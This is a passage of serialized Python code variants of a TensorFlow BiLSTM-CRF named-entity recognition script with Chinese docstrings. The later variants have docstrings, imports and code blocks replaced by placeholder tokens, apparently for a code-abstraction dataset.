batch_size):\n\n batch_x = train_X[i: min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i: min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i: min(i + batch_size, train_X.shape[0])]\n\n acc, cost, _ = sess.run(\n [model.accuracy, model.cost, model.optimizer],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run(\n [model.accuracy, model.cost],\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n model.labels: batch_y\n },\n )\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.format(e, i//batch_size+1, cost, acc))\n\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n\n print('epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i: min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i: min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i: min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(\n sess.run(model.tags_seq,\n feed_dict={\n model.word_ids: batch_x,\n model.char_ids: batch_char,\n },\n )\n )\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n\n print(classification_report(np.array(real_Y).ravel(), np.array(predict_Y).ravel()))", "<docstring token>\nimport re\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.metrics import classification_report\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n 
hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n 
out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}\n tag2idx = {'PAD': 0}\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n seq_len = 50\n X_seq, Y_seq = to_train_seq(train_X, train_Y)\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape)\n print(X_char_seq.shape)\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape)\n print(X_char_seq_test.shape)\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n tf.reset_default_graph()\n sess = tf.Session()\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 0.001\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]\n acc, cost, _ = sess.run([model.accuracy, model.cost, model.\n optimizer], feed_dict={model.word_ids: batch_x, model.\n char_ids: batch_char, model.labels: batch_y})\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run([model.accuracy, model.cost], feed_dict={\n model.word_ids: batch_x, model.char_ids: batch_char, model.\n labels: batch_y})\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n print(\n 'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.\n word_ids: batch_x, model.char_ids: batch_char}))\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n print(classification_report(np.array(real_Y).ravel(), np.array(\n predict_Y).ravel()))\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 
词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param 
labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\nif __name__ == '__main__':\n left_train, right_train = parse('./data/eng.train')\n left_test, right_test = parse('./data/eng.testa')\n word2idx = {'PAD': 0, 'NUM': 1, 'UNK': 2}\n tag2idx = {'PAD': 0}\n char2idx = {'PAD': 0}\n word_idx = 3\n tag_idx = 1\n char_idx = 1\n train_X, train_Y = parse_XY(left_train, right_train)\n test_X, test_Y = parse_XY(left_test, right_test)\n idx2word = {idx: tag for tag, idx in word2idx.items()}\n idx2tag = {i: w for w, i in tag2idx.items()}\n seq_len = 50\n X_seq, Y_seq = to_train_seq(train_X, train_Y)\n X_char_seq = generate_char_seq(X_seq)\n print(X_seq.shape)\n print(X_char_seq.shape)\n X_seq_test, Y_seq_test = to_train_seq(test_X, test_Y)\n X_char_seq_test = generate_char_seq(X_seq_test)\n print(X_seq_test.shape)\n print(X_char_seq_test.shape)\n train_X, train_Y, train_char = X_seq, Y_seq, X_char_seq\n test_X, test_Y, test_char = X_seq_test, Y_seq_test, X_char_seq_test\n tf.reset_default_graph()\n sess = tf.Session()\n dim_word = 64\n dim_char = 128\n dropout = 0.8\n learning_rate = 0.001\n hidden_size_char = 128\n hidden_size_word = 128\n num_layers = 2\n batch_size = 32\n model = Model(dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers)\n sess.run(tf.global_variables_initializer())\n for e in range(3):\n train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0\n for i in range(0, len(train_X), batch_size):\n batch_x = train_X[i:min(i + batch_size, train_X.shape[0])]\n batch_char = train_char[i:min(i + batch_size, train_X.shape[0])]\n batch_y = train_Y[i:min(i + batch_size, train_X.shape[0])]\n acc, cost, _ = sess.run([model.accuracy, model.cost, model.\n optimizer], feed_dict={model.word_ids: batch_x, model.\n char_ids: batch_char, model.labels: batch_y})\n train_loss += cost\n train_acc += acc\n print('train_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n acc, cost = sess.run([model.accuracy, model.cost], 
feed_dict={\n model.word_ids: batch_x, model.char_ids: batch_char, model.\n labels: batch_y})\n test_loss += cost\n test_acc += acc\n print('test_data: epoch:{}, step:{}, loss:{}, accuracy:{}'.\n format(e, i // batch_size + 1, cost, acc))\n train_loss /= len(train_X) / batch_size\n train_acc /= len(train_X) / batch_size\n test_loss /= len(test_X) / batch_size\n test_acc /= len(test_X) / batch_size\n print(\n 'epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\\n'\n % (e, train_loss, train_acc, test_loss, test_acc))\n real_Y, predict_Y = [], []\n for i in range(0, len(test_X), batch_size):\n batch_x = test_X[i:min(i + batch_size, test_X.shape[0])]\n batch_char = test_char[i:min(i + batch_size, test_X.shape[0])]\n batch_y = test_Y[i:min(i + batch_size, test_X.shape[0])]\n predicted = pred2label(sess.run(model.tags_seq, feed_dict={model.\n word_ids: batch_x, model.char_ids: batch_char}))\n real = pred2label(batch_y)\n predict_Y.extend(predicted)\n real_Y.extend(real)\n print(classification_report(np.array(real_Y).ravel(), np.array(\n predict_Y).ravel()))\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n 
).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\ndef iter_seq(x):\n return np.array([x[i:i + seq_len] for i in range(0, len(x) - seq_len, 1)])\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in args]\n\n\ndef generate_char_seq(batch):\n \"\"\"\n 传进来是50一个块 总共有多少块\n 然后将每块的单词转为字符序列\n :param batch:\n :return:\n \"\"\"\n x = [[len(idx2word[i]) for i in k] for k in batch]\n maxlen = max([j for i in x for j in i])\n temp = np.zeros((batch.shape[0], batch.shape[1], maxlen), dtype=np.int32)\n for i in range(batch.shape[0]):\n for k in range(batch.shape[1]):\n for no, c in enumerate(idx2word[batch[i, k]]):\n temp[i, k, -1 - no] = char2idx[c]\n return temp\n\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p])\n out.append(out_i)\n return out\n\n\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n\n def __init__(self, dim_word, dim_char, dropout, learning_rate,\n hidden_size_char, hidden_size_word, num_layers):\n \"\"\"\n :param dim_word: 词的维度\n :param dim_char: 字符维度\n :param dropout: dropout\n :param learning_rate: 学习率\n :param hidden_size_char: 字符隐层输出维度\n :param hidden_size_word: 词隐层输出维度\n :param num_layers: 几层\n \"\"\"\n\n def cells(size, reuse=False):\n return tf.contrib.rnn.DropoutWrapper(tf.nn.rnn_cell.LSTMCell(\n size, initializer=tf.orthogonal_initializer(), reuse=reuse),\n output_keep_prob=dropout)\n self.word_ids = tf.placeholder(tf.int32, shape=[None, None])\n self.char_ids = tf.placeholder(tf.int32, shape=[None, None, None])\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n self.maxlen = tf.shape(self.word_ids)[1]\n self.lengths = tf.count_nonzero(self.word_ids, 1)\n 
self.word_embeddings = tf.Variable(tf.truncated_normal([len(\n word2idx), dim_word], stddev=1.0 / np.sqrt(dim_word)))\n self.char_embeddings = tf.Variable(tf.truncated_normal([len(\n char2idx), dim_char], stddev=1.0 / np.sqrt(dim_char)))\n word_embedded = tf.nn.embedding_lookup(self.word_embeddings, self.\n word_ids)\n char_embedded = tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\ndef parse(file):\n \"\"\"\n 加载文件并且解析\n :param file: 文件名\n :return: 词<->词性\n \"\"\"\n with open(file) as fopen:\n texts = fopen.read().split('\\n')\n left, right = [], []\n for text in texts:\n if '-DOCSTART' in text or not len(text):\n continue\n splitted = text.split()\n left.append(splitted[0])\n right.append(splitted[-1])\n return left, right\n\n\ndef process_string(string):\n \"\"\"\n :param string:\n :return:\n \"\"\"\n string = re.sub('[^A-Za-z0-9\\\\-\\\\/ ]+', ' ', string).split()\n return ' '.join([to_title(y.strip()) for y in string])\n\n\ndef to_title(string):\n if string.isupper():\n string = string.title()\n return string\n\n\ndef parse_XY(texts, labels):\n \"\"\"\n 整理词性表  词表  字符表  并将文本转为对应的数字序列\n :param texts: 文本 词的一个列表\n :param labels: 词性的一个列表\n :return: 词转为id的序列 词性转为id的序列\n \"\"\"\n global word2idx, tag2idx, char2idx, word_idx, tag_idx, char_idx\n X, Y = [], []\n for no, text in enumerate(texts):\n text = text.lower()\n tag = labels[no]\n for c in text:\n if c not in char2idx:\n char2idx[c] = char_idx\n char_idx += 1\n if tag not in tag2idx:\n tag2idx[tag] = tag_idx\n tag_idx += 1\n Y.append(tag2idx[tag])\n if text not in word2idx:\n word2idx[text] = word_idx\n word_idx += 1\n X.append(word2idx[text])\n return X, np.array(Y)\n\n\n<function token>\n\n\ndef to_train_seq(*args):\n \"\"\"\n :param args: 词转为的id的序列   词性转为id的序列\n :return:\n \"\"\"\n return [iter_seq(x) for x in 
